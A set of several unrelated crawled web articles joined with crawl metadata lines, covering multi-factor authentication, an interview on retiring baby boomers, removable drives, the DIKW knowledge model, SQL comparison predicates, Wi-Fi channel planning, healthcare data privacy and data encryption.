In general, MFA authentication methods can be divided into three categories. All of the remaining methodologies are based on one of these three types:
Things you know (knowledge)
Knowledge-based authentication usually requires the user to answer a personal control question. Knowledge factor techniques typically include passwords, four-digit personal identification numbers (PINs), and one-time passwords (OTPs). Typical user scenarios include the following:
- Reading a debit card and entering the PIN at the checkout counter at the grocery store;
- Downloading a VPN client with a valid digital certificate and logging into a VPN before gaining access to the network;
- Providing information, such as the mother's maiden name or previous address, to gain access to the system.
Things you have (possession)
To log in, the user must carry something specific, such as a badge, token, key fob, or SIM card with the caller ID module. For mobile authentication, the smartphone often provides a possession factor in combination with the OTP application. Possession factor technologies include:
- Security tokens are small hardware devices that store a user's personal information and are used to identify that person electronically. The device can be a smart card, a chip embedded in an object, such as a USB drive, or a wireless tag.
- The software security token application creates a one-time PIN to log in. software tokens are often used for mobile multi factor authentication, where the device, such as a smartphone, provides ownership factor authentication.
- Typical user possession factor scenarios include mobile authentication, where users receive a code through their smartphone to gain or grant access. Options include text messages and phone calls sent to the user as an out-of-band method, smartphone OTP applications, SIM cards, and smart cards with stored authentication data. It may also suppose connecting a hardware USB token to a desktop that generates OTP and using it to log into the VPN client.
Things you are (inalienability)
This can be any biological traits of the user confirmed at login. In addition, affiliation factor technologies include the following biometric verification methods:
- Retinal or iris scans;
- Fingerprint scanning;
- Voice authentication;
- Face recognition;
- Hand geometry;
- Digital signature scanners;
- Earlobe geometry.
The components of the biometric device include a reader, a database, and software to convert the scanned biometric data into digital data and to compare matching points between the observed data and the stored data. Typical inalienability factor scenarios include the following:
- Using fingerprint or facial recognition to access a smartphone;
- Providing EDS at a retail cash register;
- Identifying the perpetrator by earlobe geometry;
Other Types of Multi-Factor Authentication
Another subspecies of MFA is adaptive authentication, also called risk-based authentication. Adaptive authentication analyzes additional factors, taking into account context and authentication behavior, and often uses these values to determine the level of risk associated with a login attempt. For example:
- Where was the attempted access to information made?
- When was the attempted access to company information made? (I.e. during working hours or in after hours)
- What device is being used? (I.e. same as usual or different)
- Is the connection through a private network or a public network?
Based on the answers to these questions, the risk level is calculated, and the system decides whether the user will be asked to enter an additional authentication factor or will be allowed to log in. When using adaptive authentication, the user only needs to enter a username and password when logging in from the office as workday starts. However, a user who logs in from a coffee shop late at night, which is not typical, may need to enter a code sent in a text message to his phone, in addition to standard authentication.
Difference between MFA and Two-Factor Authentication (2FA)
MFA is often equated with two-factor authentication (2FA). They are similar, but 2FA is a simplified subspecies of MFA because 2FA limits the number of required factors to only two, whereas MFA can be two or more. MFA is a broader practice, which accepts several possible ways to authenticate the user, and thus more relevant for corporation-scale cybersecurity solutions. Two-factor authentication is generally easier to establish and maintain, as you should not keep all possible information needed for authorization. It get a widespread application for sole users' cybersecurity approaches.
What are the pros and cons of MFA?
Multi-factor authentication was introduced to increase the security of access to systems and applications through software and hardware. The goal was to identify users' identities and guarantee the integrity of their digital transactions. The disadvantage of MFA is that users often forget the answers to the control questions that confirm their identity, and some users exchange personal identifiers and passwords. MFA has both advantages and disadvantages.
- Adds additional layers of security at the hardware, software, and personal identification levels;
- Can use one-time passwords sent to phones that are randomly generated in real-time and difficult for hackers to crack;
- Can reduce security breaches by up to 99.9% compared to passwords alone;
- Users can easily customize it;
- Allows businesses to restrict access based on specific characteristics, such as time of day or location;
- It is scalable in cost, as there are both expensive and complex MFA tools and more affordable ones for small businesses.
- Requires a phone to receive a text message code;
- Hardware tokens can be lost or stolen;
- Phones can also be lost or stolen;
- Biometric data by MFA algorithms for personal identifiers, such as fingerprints, are not always accurate and may create false positive or negative results;
- MFA checks may fail in the absence of the Internet;
- MFA methods must be continually improved to protect against criminals who work tirelessly to hack them.
The future of MFA: AI, ML, and more
Multi-factor authentication is constantly evolving, providing more secure access for organizations and sometimes being inconvenient for users. But, again, biometrics is the optimal solution. It's safer because it's difficult to tamper with a fingerprint or face. After all, the user doesn't have to remember everything (such as a password) or make any other effort. Here are some of the advances shaping multi-factor authentication today.
Artificial Intelligence (AI) and Machine Learning (ML) - AI and ML can be used to recognize behavior, indicating whether a given access request is "normal" and therefore requires no additional authentication (or conversely, to identify abnormal behavior). This, in particular, is currently performed with the help of user behavior analytics (UBA).
Fast Identity Online (FIDO) - FIDO authentication is based on the FIDO Alliance's set of free and open standards. It allows you to replace login with a password with a secure and fast login to websites and applications.
Passwordless authentication. Instead of using a password as the primary method of identity verification and supplementing it with other non-password methods, password-free authentication eliminates passwords as a form of authentication.
Rest assured that multi-factor authentication will continue to change and improve in finding ways for people to verify their identity - reliably and without jumping through hoops.
Frequently Asked Questions
SSO, or Single Sign-On, is a login mechanism where the user logs into a single account that is considered safe. After that it has the ability to use all the sites and services that are related to the login account without the need to log in once again. SSO is applied in a chain of services from Google and Bing.
Meanwhile, MFA is about asking for several identity confirmations before letting the user in. It is also about the login way, but supposes much less trust and fits better at the places that does not suppose the trusted login. Still, they may be combined (first you log in with MFA, then you can use all services with SSO). | <urn:uuid:882b79eb-be7e-456d-bd8b-df04e1976357> | CC-MAIN-2022-40 | https://gridinsoft.com/mfa | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00561.warc.gz | en | 0.93428 | 2,083 | 3.484375 | 3 |
Demographic issues are in the air. IBM recently announced plans to train 10,000 new mainframe workers by 2010, the year boomers born in 1945 turn 65. Encouraging people to work beyond retirement age will be necessary to prop up declining labour force levels, according to a 2005 Conference Board of Canada study. IBM also launched a new consulting area to help organizations deal with the impending loss of experienced older workers. Is the situation as dire as it appears? To get some perspective on the matter, ComputerWorld Canada Senior Writer Rosie Lombardi spoke with the man who wrote the book — literally — on demographics: David Foot, author of Boom, Bust and Echo.
What kind of demographic shifts are we going to see in the near future?
In Canada, the first baby boomers were born in 1947, and they’ll reach age 65 in 2012. Some boomers in certain occupations can retire before 65. So we have a few front-end boomers, primarily in the public sector, beginning to retire now and trickling out from public service, teaching, civil service, military and some unionized jobs.
So how big a problem will retiring boomers be for Canada?
Not a problem at all. The peak of the baby boom was 1960 [in Canada]. Those people are only 45 today, so by 2010, they’re 50. There’s still another 15 years before they retire. This idea that boomers will retire en masse, I don’t know where it cropped up. The baby boom was 20 years long, and it’s going to take 20 years for them all to retire. There’s also another issue here: we’re going to have a labour market surplus, not simply because boomers aren’t retiring, but their kids, the echo boomers, are coming into the workforce. We’ve got exploding college and university enrollment now, and they’re graduating. At the front end, the echo boomers born in the 1980s are now 25.
Is IBM misguided in offering training and services to deal with retiring workers?
I really don’t mind them thinking that way, because it means we’re going to see an investment in apprenticeship programs, which we badly need. There’s no doubt in certain occupations, we will have a labour market shortage. In a lot of skilled trades, we abandoned our apprenticeship programs in the early 1980s. But this has nothing to do with retiring boomers. Yes, there will be some attrition of experienced people out of select occupations, but it’s not a massive exodus. [The problem] is that we haven’t been planning the inflow, and not that the outflow is [leaving]. The retiring workers are a catalyst to deal with a long-standing problem.
Are there generational differences due to the technology environment people grew up in?
No. It’s purely the points of their lives [that defines them]. Back when I was in my twenties, I was a brilliant Fortran programmer. I haven’t lost those technology skills, but they’re irrelevant today. And that happens to everybody. You’re at the frontier of technology in your twenties, and round about age 30, you get more responsibilities at work and start a family. There’s nothing like a kid and a mortgage to get you focused. When the boomers were in their twenties, they were perceived as disloyal, and there’s nothing different in today’s generation. They want to [travel], get experience, move up fast — they’re acting just like the boomers did. Those in their thirties now, they’re the people in the 1990s who were part of the big technology boom, they were never going to settle down. Today they want to work for big organizations like IBM. They need stability now that they have kids and mortgages. People act their age — there’s little difference in attitudes or aspirations.
Do you have any advice on the best way to manage the outflow of older workers?
For boomers, you might want to have some type of phased retirement policy. There are a lot of people after age 50-55 who would love to spend every weekend with their grandkids. Why not have them work four days a week for 80 per cent of salary? They want to play golf. Why not have them work nine months of the year at 75 per cent salary? So we need some sort of phased retirement where we proportionately reduce work load and salary. That’s the way to keep the experience around, but begin to save on their salaries. We also need some way to deal with the pension issues, and we’re not confronting that at all. If you can take the 55-year-olds and send them on special assignments for three days a week, you’ve created an opportunity for [younger workers]. Bringing them into management positions now is a great idea. [They can] work with people who are leaving the position, but who are still around to mentor them. | <urn:uuid:26b9ae89-2f93-450b-b256-65552c02975d> | CC-MAIN-2022-40 | https://www.itworldcanada.com/article/retiring-boomers-alter-job-landscape/14395 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00561.warc.gz | en | 0.969392 | 1,064 | 2.609375 | 3 |
Removable Drives, Data Transport, and Data Security
CRU has a long history of providing removable drives around the world to government and military agencies, businesses of all sizes, digital cinema, educational institutions–the list goes on. Removable drives are a very cost-effective and safe way to manage data for transport, security, backup, growing big data sets, and archiving.
Organizations use removable drives for:
- Transporting data. Moving data via removable drive is a proven, high-speed method for all kinds of applications. After all, FedEx/your favorite shipper is always more efficient than the internet. Thank you, xkcd.
- Implementing a reliable backup strategy. The best way to safeguard your data is to make multiple copies, and store some of those copies at a separate, safe offsite location.
- To improve data security. If you have highly sensitive data, removing disks nightly and moving them to a secure facility/SCIF, safe, or room improves data security and is often part of a removable drive workflow.
- For fast disaster recovery. Moving copies of data offsite helps organizations and businesses recover quickly in the event of a disaster. This helps mitigate business downtime after an unfortunate event, or anytime data is lost.
- Many need to move large datasets to different offices, locations, or for client delivery. Using an encrypted disk carrier, like the DataPort 10 Secure 256-bit, is a safe way to accomplish this.
- Portable work environment. If you have a large amount of data, or unique operating environment, it’s often easier to pull a removable drive from one workstation and go to another to easily have the same computing environment as you want.
- For backup, archiving or long-term data storage. Using removable drives in a disk-to-disk backup and archiving strategy lets you easily save data by project or job, keep track of expanding data sets, or restore data if need be.
- Boot into a unique operating system/environment image. Yes, many people are content to do this with virtual machines, but if you’re tracking down a nasty virus or bit of malware, or need a guaranteed clean OS and applications environment, it’s straightforward to keep separate environments on separate removable drives and maintain high-performance data communications.
Removable Drives Anatomy
Removable hard drives use “drive carriers” that house SSDs, 2.5-inch hard drives, and 3.5-inch hard drives. CRU drive carriers are made of metal for ruggedness and durability, though there are a few plastic models we made for particular customer use cases. CRU drive carriers are rigorously designed to provide high-speed 6G communication between the drive and the computer/host it is used with. Drive carriers protect drives as well as provide the ability to hot swap drives without powering down the host computer or opening the case.
The drive carriers are inserted into/removed from “receiving frames” that are installed into host devices such as workstations and other computers, not to mention purpose-built devices such as aircraft and military vehicles, video surveillance recorders, ATMs, point-of-sale terminals, and so on.
CRU designs the frames and carriers in tandem so they meet the shock, vibration, data integrity, regulatory, and other requirements our customers demand.
External Hard Drives
Sometimes people use the term removable drive to refer to external hard drives, which we call hard drive enclosures, since we believe in the ability to grow data sets and use your preferred storage media, so we focus on designing high-quality enclosures and leave the drive media to others.
How Do Removable Drives Work?
The removable drive system works like this: install a disk or SSD into a rugged drive carrier, and then into a frame in a computer/host (or if using a CRU TrayFree™ system, directly into the drive enclosure). Remove the drive/carrier as needed for transport, security, drive rotation, when full, or when your workflow calls for it. A common implementation of this system uses a frame or enclosure that encrypts data for the ultimate in information security. CRU® offers several product options to securely encrypt your data; learn more about encryption here.
Popular CRU Removable Drives
With its DataPort® and Data Express® product lines, CRU has for decades been the dominant supplier of removable drives to well-known computer manufacturers and integrators, government and military agencies, and other industries.
The CRU DataPort® product line includes the industry standard DataPort 10 and DataPort 25 rugged removable carriers and frames, as well as the compact and efficient DataPort 41 for four 2.5-inch drives. Using a removable hard disk storage methodology is necessary to implement a sound business backup and data protection strategy because it is a practical way to move your data–in the form of hard disks–from place to place, including offsite locations. This data portability is important for the 3-2-1 Backup Rule.
Removable Drives and the Cloud
Clearly, removable drives fit well into workflows that include cloud-based storage or applications. They’re the basis of a foolproof onsite backup methodology, as well as offer a way to quickly seed a cloud environment.
According to Forbes, more than half of U.S. businesses are using cloud applications, including cloud backup services. Following the aforementioned 3-2-1 backup rule means having more than just the cloud to back up data. In fact, storing data in the cloud may not be a sound data practice for many clients, depending on the sensitivity of their data and how dependent they are on fast access to such data. Aside from security, privacy, and access concerns, the cloud also may not be the safe haven for data that some would have you believe.
According to the Symantec report, “Avoiding the Hidden Costs of the Cloud“:
- 47% of enterprises lost data in the cloud and had to restore their information from backups
- 37% of SMBs have lost data in the cloud and had to restore their information from backups
- 66% of those organizations saw recovery operations fail
These statistics reinforce why CRU recommends using a removable disk strategy for data transport, security, backup, and IT flexibility. | <urn:uuid:ffac4c0c-3843-49ff-8c06-f7293258d34d> | CC-MAIN-2022-40 | https://www.cru-inc.com/data-protection-topics/removabledrives/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00761.warc.gz | en | 0.932894 | 1,312 | 2.546875 | 3 |
Under the Service Transition Segment of ITIL Knowledge Management, the DIKW model is a fundamental concept. When we accumulate raw data, it comes in a topsy-turvy manner. DIKW pyramid explains how the data can be refined and transformed into Information, Knowledge, and Wisdom with a constituent of actions and decisions.
Prologue to DIKW Pyramid:
Under the Service Transition division of ITIL Knowledge Management, the DIKW model is a critical component. The DIKW pyramid is seen from experience as a method of researching, communicating, connecting, and reflecting. Data, information, knowledge, and wisdom, are depicted as four distinct layers in the DIKW Model (Data-Information-Knowledge-Wisdom). Data is the base foundation of the pyramid, then the next layer is Information, the third layer is knowledge, and the fourth layer is wisdom, the apex. DIKW model is widely used in Information Science and Knowledge Management-ISKM. Theoreticians widely use DIKW Model in library and Information Science.
It is an approach to determine the unrefined or unorganized external information such as figures or characters that are yet to be explained. For instance, without a framework, data can seem little. Example: 25012012 is a series of numbers without manifest importance. However, if we view it in the framework of this, it is a date we can easily identify 25th January 2012. By adding circumstances to the numbers, now adds more value.
Information is the second building block of the DIKW hierarchy model. In this, the data has been purified free of errors and processed in an approach that makes it easy to evaluate, envisage, and examine the inputs for a specific purpose to establish organizational needs. The essential aspect of information management is apart from responding to queries; it also helps identify organizational contexts.
Subject to the purpose, information processing will entail different actions such as aggregation to ensure the accumulated data is relevant and accurate (Validation). For instance, we arrange the information in an approach that reveals the link between diverse apparently different and unconnected data points. More specifically, we can examine the Dow Jones Index's output by constructing a graph of data points for a specific time span based on the information at each day's closing.
We may extract valuable information from the data and make it more beneficial for us by asking important questions about "Who, What, Where, and Where.” But when we get the question as to “How,” then what leaps information to Knowledge.
Knowledge is the third phase in DIKW Model. It represents a collection of accurate data. This phase seeks to find the answer to the “How” query. “How” the information is obtained from the accumulated data relevant o our goals? “How” the pieces of information are connected to other pieces and add more meaning and value? And “How” can we apply the knowledge aspect to accomplish our goal?
Knowledge is commonly the edge that organizations have over their enterprises. As we reveal the relationships clearly stated as information, we get profound insights that take us higher the DIKW Model. When we utilize knowledge and insights achieved from the information to make dynamic decisions, we can say ha we have reached the final phase – the “Wisdom” step of the DIKW model.
Wisdom- This is the utmost level in the DIKW hierarchy model, and it seeks to respond to the queries related to “Why do something? As well as “What is best? In other words, “Wisdom is intelligence in action,” to put it another way. Knowledge and Wisdom are linked to the present and future in achieving goals.
It is the last phase of the DIKW hierarchy model. It is a method to get the final desired results by calculating through the assumption of knowledge. It considers all the output of preceding levels of the DIKW Model and applies it through a special form of human programming (like moral, ethical codes, etc).
How Businesses and Organizations Progress Through the Knowledge Model:
Employing Semantic Technologies such as Linked Data and Semantic Graph Databases is an easy and quick way for businesses and organizations to complete the steps of the DIKW Model from Data to Information to Knowledge to Wisdom. These technologies may establish links between diverse and miscellaneous data and conclude knowledge from available and existing facts. With this new insight, businesses and companies can ascend the wisdom mountain and gain a competitive advantage by using data-driven analytics to aid their business decisions.
DIKW Model in ITSM:
DIKW Model is the ITIL v3 version of Knowledge Management. It is described as a growth path for comprehension or understanding. This concept is a virtuous one as it builds on the traditional view that Data becomes more beneficial once it is refined and processed into information. The DIKW pyramid applies to ITSM as ITSM comprises knowledge in IT. In the course of day-to-day operations and service delivery, critical data is produced. The data is in the form of a metric function, and the data is also generated during the course of conducting business research involved in responding query by the Help Desk. Data after primary generation become information when examined, contextualized, and exhibited in a dashboard or report. This data becomes more beneficial when examined and easy to make data-driven decisions. Finally, this knowledge may become Wisdom when used by individuals are utilized with insight to resolve difficult challenges or to establish unique solutions.
One fundamental aspect of ITSM is to computerize as much information as realistic to assist support service work. Service delivery comprises all activities offered for IT Operations activity. In the concept of ITSM, knowledge not only internalizes for organizational application but also changes the way processes are carried out as a result of previously existed documented knowledge. | <urn:uuid:c6ae7d0c-f777-467d-a79f-d0e94d8bbbfc> | CC-MAIN-2022-40 | https://www.itil-docs.com/blogs/itil-concepts/dikw-model | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00761.warc.gz | en | 0.929868 | 1,219 | 2.75 | 3 |
Comparison predicates compare two expressions and return whether the comparison is true.
The following tables lists the comparison predicates you can use:
|!=||Inequality check (the aliases <> and ^= also exist for this)|
|<||Check for "less than"|
|<=||Check for "less than or equal to"|
|>||Check for "more than"|
|>=||Check for "more than or equal to"|
- If one of the two expressions is a NULL value, the result is also a NULL value. | <urn:uuid:e0d26006-233b-4040-b1bd-5901497a1a44> | CC-MAIN-2022-40 | https://docs.exasol.com/db/6.2/sql_references/predicates/comparison_predicates.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00761.warc.gz | en | 0.705138 | 147 | 2.609375 | 3 |
There are many tasks associated with properly designing and deploying a wireless network—one of the most important is developing a channel plan. A well-developed channel scheme will assist with squeezing every bit of precious airtime, which is one of the foundations of high performing Wi-Fi Networks.
Before we go too much further, let’s go over a few of the basics. The IEEE 802.11 standard defines operation for wireless networks in both the 2.4 GHz, 5 GHz and now 6 GHz frequency ranges. Depending on where you are in the world, you will have different amounts of channels that you can have access to with different rules and regulations.
In the United States, the 2.4 GHz band is broken up into 11 channels (1-11), each 20MHz wide. In the 5 GHz band, we have channels ranging from 36 up to 165, and in the 6 GHz band, we have Wi-Fi channels ranging from 1-233.
2.4 GHz Channel Planning
Even though there are 11 channels available in 2.4 GHz in the US, only 3 of them do not “overlap” or interfere with one other: 1, 6, and 11.
2.4 GHz Channel Overlap & Adjacent Channel Interference
Without getting too deep on how wireless communication happens, when a station (Access Point, client device, etc.) has something to transmit, it must wait for the channel to be clear. Put simply, only one device can successfully transmit at a time. When overlapping channels are used, any stations (STAs) on those channels will transmit independent of what is happening on the other channels, causing a degradation of performance. Think of it like being between radio stations and having a mix of country overlapping on your favorite metal station. This type of interference is called Adjacent Channel Interference (ACI).
2.4GHz Channel Overlap. Source: Ekahau ECSE Design Course
Adjacent Channel Interference. Source: Ekahau ECSE Design Course
2.4 GHz Co-Channel Interference
Co-Channel Interference (CCI), on the other hand, is when 2 or more AP’s that are in the same area are operating on the same channel. This essentially turns both cells (a cell is the coverage area for an AP) into one big cell. This means that any STA that has anything to transmit now must wait for not only the other STAs associated to the same AP, but also all the STAs associated to the other AP on the same channel. While not as damaging as ACI, CCI will also degrade performance. This is caused by more devices trying to gain access to the wireless medium on the same channel, making STAs wait longer for their chance to transmit.
2.4 GHz CCI (Co-Channel Interference) Source: Ekahau ECSE Design Course
Up to this point, we have only used the 2.4 GHz band for examples. With its limited amount of available spectrum, it is highly recommended that only non-overlapping 20 MHz channels are used.
5 GHz Channel Planning
Now that we have that covered, let’s move the discussion over to 5 GHz. There is significantly more spectrum available in this band, with each channel occupying its own 20 MHz non-overlapping slice. This is where the topic of channel width gets interesting.
Choosing the Right Channel Width for Your Wi-Fi Network
Whether you are using a static channel plan or a vendor’s dynamic channel assessment/assignment algorithm (pretty much all of them offer some version of this functionality), there are a few things to consider besides just picking Wi-Fi channels. One of the most important is deciding on the proper channel width to use.
Standard 20 MHz channels can be combined to increase the size of the channel with the goal of achieving a higher data rate. The wider the channel, the more data can be pushed through it. You know those impressive throughput numbers vendor’s love to tout in the AP datasheets? Those are achieved by using these wide channels. Some vendors’ equipment these days is even set to these wide channels by default right out of the box.
These wide Wi-Fi channels are created by bonding multiple adjacent 20MHz channels together, using the center frequency to denote the channel. For example, channels 36 and 40 (each 20MHz) are bound together to make 40MHz channel 38, etc.
Source: Wireless LAN Professionals
Sounds great, right? So why not just set your APs to the widest channel available and call it a day? Let’s refer back to the beginning of this post, particularly where we discussed Co-Channel Interference (CCI). The 5 GHz band allows for 9 20MHz channels in UNII-1 and UNII-3 (non-DFS). There are another 16 20MHz channels in UNII-2 (DFS), but these come with their own set of complications, which we will discuss later in the blog.
Let’s say we have decided to use 80MHz channels for our deployment. We just went from 25 non-overlapping channels down to 6. Now, for APs that are at opposite ends of the facility that cannot hear each other too loudly, this is not really a problem. Where problems begin is APs that are in close proximity to each other (hearing each other with at least 4dB above noise floor, typically around -85 dBm or higher). These APs, and any STAs associated to them, now all become part of the same cell, slowing everything down due to increased contention. All STAs need to wait their turn to access the medium.
The other item to consider here is that every time you widen the channel, (20MHz – 40MHz & 40MHz – 80MHz, etc.) you introduce an extra 3dB of noise to the channel. That is effectively doubling the noise. Simplifying this, you now have more noise and no gain in signal. This equates to a lower SNR (Signal-to-Noise ratio), which will in turn force a lower MCS rate, shrinking your data rate and throughput, and possibly negating the benefits of using channel aggregation entirely or even resulting in lower capacity vs 20 MHz channels.
Using Mixed Channel Widths in Wi-Fi
Adding to the topic of bonding channels together in 5GHz, if you are in an environment where you have a mixture of wide and non-wide channels on your own infrastructure, or there are neighboring wireless network infrastructures around you that are using wide channels on 5GHz, this could be a big potential cause of degradation on yours and their Wi-Fi’s performance due to increased amount of collisions (and therefore retransmissions) and potentially using protection mechanisms in the form of Request to Send / Clear to Send (RTS / CTS) control frames that add to the protocol overhead.
One of the hallmarks of a high-performing Wi-Fi network is channel reuse. This is the practice of deploying channels in such a manner that they limit the amount of CCI introduced into the environment. The best way to achieve this is by having as many channels to deploy as possible. While a 20MHz channel will not achieve the higher data rates that are advertised with 80MHz, clients can still reach acceptable speeds, allowing you to optimally use every bit of available airtime.
All of this said, every situation is different. What if you have one AP at your small or home office, decent SNR everywhere and no neighbors/outside sources of contention? Set it to 80MHz or 160MHz and let it rip!
If you have a small to medium size deployment and have done your homework (with Ekahau Pro, of course!) to ensure you can use 40MHz channels, give it a shot!
Use wide channels until you can’t.
The bottom line is that for most enterprise-type deployments with many APs, sticking with narrow Wi-Fi channels will give you the spatial reuse you need for your WLAN to perform optimally and leave users satisfied.
Other Considerations for your 5 GHz Channel Planning
Some of the 5 GHz band may be affected by radar activity, called DFS (Dynamic Frequency Selection). Out of 25 available 5 GHz channels in the US and EU, only 9 single 20MHz wide channels (UNII-1 and UNII-3) are unaffected by it. As part of the 802.11h DFS compliance standard, when DFS activity is detected, APs must close channel transmission within 200 ms of DFS detection, clients have 10 seconds to move to a different channel, the AP will not transmit for 60 seconds and will change to a channel that is not DFS affected before it starts transmitting again. The channel that DFS activity was observed on also goes into ‘nonoccupancy’ mode for 30 minutes. But it’s not just the access points that respond to DFS channels. Wi-Fi client devices also behave differently depending on if they are using DFS channels or not.
Passive Scanning Clients
If our Wi-Fi client devices are using passive scanning to discover an SSID, this will mean that they are going on to a Wi-Fi channel — let’s say channel 36 on the 5GHz band as an example — to wait a period of time (around 105ms) for a beacon. Once the device has finished waiting on channel 36 it will then move on to the next channel (40 in this example), wait 105ms for a beacon and, if it hasn’t heard the SSID that it wants to connect to, it will continue to move through the channels until it finally does and then will being the association process.
I know that 105ms doesn’t sound like a long time, but when you multiply that by the 25 channels available in 5GHz, it quickly adds up!
Active Scanning Clients
Moving on to active scanning, rather than the device waiting on a channel to listen for beacons, they go on to the channels and send a frame that is called a ‘Probe Request’ which upon hearing, the APs will respond to with a frame that is called a “Probe Response’ containing the list of SSIDs that the AP’s radios support. The main difference here is that active scanning can be up to 5X faster than passive scanning, as sending a probe request and getting a probe response typically takes around 20ms.
Sounds good, right? So why do our devices not always use active scanning instead of passive scanning? Well, there is a slight catch here. Wi-Fi client devices can only send Probe Request frames on non DFS channels. That means they can only do active scanning on the UNII-1 & UNII-3 channels, whereas on the UNII-2 & UNII-2c channels, they can only do passive scanning.
If you have an environment where you are using the DFS channels in 5 GHz, roaming for your client devices may be noticeably slower. If your devices are using any time-sensitive applications over Wi-Fi, like a voice call for example, the experience may be poor.
Remember, not all Wi-Fi client devices support all of the DFS channels, and some devices may not support them at all! If this is the case and you have the DFS channels enabled in your environment and a Wi-Fi client device comes along that does not have support for the DFS channels you have enabled – well guess what, they will not even be able to hear or discover any Wi-Fi on 5 GHz in that area. To these devices, it will seem like there is no Wi-Fi there at all or that you have a massive coverage hole in your design.
Please make sure that you check your device’s manufacturer data sheet to get a clear idea of which 5GHz channels they support!
Want to Learn More?
For even more tips on Wi-Fi channel planning best practices, register for our upcoming webinar, Demystifying Wi-Fi: Channel Planning Made Simple. In the webinar, we’ll dive deeper into Wi-Fi channel planning by discussing:
- What are Wi-Fi channels?
- How channel overlap occurs and how to plan around it
- The difference between adjacent channel & co-channel interference
- CSMA/CA aka DCF aka “The Game”
- Band comparison of 2.4 GHz and 5 GHz and how they each inform channel planning
- Optimizing for the right channel widths for your network | <urn:uuid:71a1c3a0-d25d-47a7-a283-251954269640> | CC-MAIN-2022-40 | https://www.ekahau.com/blog/channel-planning-best-practices-for-better-wi-fi/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00761.warc.gz | en | 0.945619 | 2,609 | 3.234375 | 3 |
In this blog post
Complying with Data Protection Legislation and Meeting the Changing Needs
When globalization and the Internet grew, data started to travel through international borders. This free flow of data then created the need for regulations that governed various aspects of data collection, quality, security, and usage. In the 1980s, Organization for Economic Cooperation and Development (OECD) created the 1980 Guidelines on the Protection of Privacy and Transborder Flows of Personal Data. Consequently, the laws have evolved since to tackle newer risks and changing needs.
History of Data Privacy Laws & Legislations
The concept of data privacy has evolved over the years, while the word ‘privacy’ holds high significance now among the common man and businesses alike. In 2004, the U.S. government had decided to ensure that patient data was stored in an electronic health record system by 2014. Today, the digitalization of records has helped the healthcare industry serve its patients better. However, with this move, the need for privacy, confidentiality, and security became imminent as records were accessed by doctors, medical providers, pharmaceutical companies, and other family members. As digital exchange of information increased, several rules and regulations were established to govern the privacy of patient data. Over the years, several privacy acts have come into existence, including HIPAA, GDPR, CCPA, PIPEDA.
- The Health Insurance Portability and Accountability Act (HIPAA) of 1996 was passed to protect individuals’ health information. The Act prevents sensitive information pertaining to patient health from being disclosed without the patient’s consent or knowledge.
- General Data Protection Regulation (GDPR) came into existence in 2018. Created for data protection and privacy in the EU and EEA, GDPR is considered one of the most robust privacy laws in the world that aims to give EU citizens control over their personal data
- The California Consumer Privacy Act (CCPA) was established in 2018 to give consumers better control over the personal information collected by businesses.
- Personal Information Protection and Electronic Documents Act (PIPEDA) defines the roles for private organizations to collect, use, and disclose personal information.
However, the implementation of these laws does not guarantee complete data protection. These laws, while useful, are not comprehensive enough to cover the complexities of data privacy and management. With newer technologies such as Artificial Intelligence coming into play, the need for renewing privacy laws has become important now more than ever. It is observed that the existing laws, such as HIPPA, still have gaps with respect to security and privacy definitions.
Emerging Privacy Risks
In recent years, the healthcare industry has fallen victim to ransomware attacks and data breaches leading to loss of reputation, money, and trust. With the advancement in ICT technologies, healthcare providers offer better service to patients by digitally accessing their history through stored Protected Health Information (PHI), which includes the patient’s name and address, the medical treatment provided, medical conditions, social security number, etc. As confidential information is stored in a location accessible by different people, the risk for breach increases. Listed below are some of the different types of privacy risks for healthcare organizations —
- PHI risk – Frequent complaints include impermissible uses of PHI, lack of safeguards of PHI, and disclosure of more than the minimum necessary PHI to unauthorized parties
- System vulnerability risk – Use of old legacy system without proper security updates
- Firewall risk – Open access to data without proper authentication
- Cybersecurity risk – Malware and ransomware attack through phishing emails and malicious links
Addressing Data Breaches and Privacy Risks
According to a recent report from Gartner, 50% of large organizations will adopt privacy-enhancing computations by 2025 for processing data in untrusted environments or multi-party data analytics use cases. While the path to complete data protection is being paved, it is crucial for organizations to focus on the best practices while remaining compliant. As one of the comprehensive privacy laws in the world, GDPR requires the appointment of a Data Protection Officer (DPO) to oversee the company’s data protection strategy and ensure compliance with the regulation. GAVS recommends:
- Regulatory compliance management – Compliance with data privacy laws helps protect the information stored within the system.
- Endpoint protection – Enabling multi-factor or dual authentication (MFA) ensures the data is always protected to avoid unauthorized access.
- Anomaly detection – Artificial intelligence can be leveraged to test for usage anomalies and alert concerned teams proactively.
- Disaster recovery – Create off-site data backup for faster recovery in case of malware or phishing attacks.
- Employee training – Educate employees across the organization through security awareness trainings to avoid human negligence, errors, or internal bad actors.
GAVS has also conducted a webinar, ‘Emerging Risks on Data Protection in Healthcare.’ To watch, click here.
GAVS offers a range of data privacy services and solutions designed to protect an organization’s information over the entire data lifecycle – from acquisition to disposal. To learn more about our offerings in the healthcare segment, please visit https://www.gavstech.com/healthcare/. | <urn:uuid:9de80f8d-0570-471b-9409-f5f74b38dc44> | CC-MAIN-2022-40 | https://www.gavstech.com/complying-with-data-protection-legislation-and-meeting-the-changing-needs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00761.warc.gz | en | 0.914546 | 1,198 | 3.3125 | 3 |
When it comes to your data, one of the essential things you need to take care of is data encryption. While dealing with exclusive data related to any sensitive business, you should ensure that it is protected and properly encoded.
When you collect customer information, you’re responsible for protecting their private data. That is why businesses need to use data encryption since it is a professional and unbreachable form of data protection.
Here’s all you need to know about data encryption and why it’s important to implement it.
Data encryption is the process of translating data into another form or code. The primary purpose of this process is to enable people with a security key or password to access their data.
The world’s biggest organizations use this effective security method to protect their data. Since data is stored on computer systems and transmitted via the internet, data encryptions do their best to keep everything confidential.
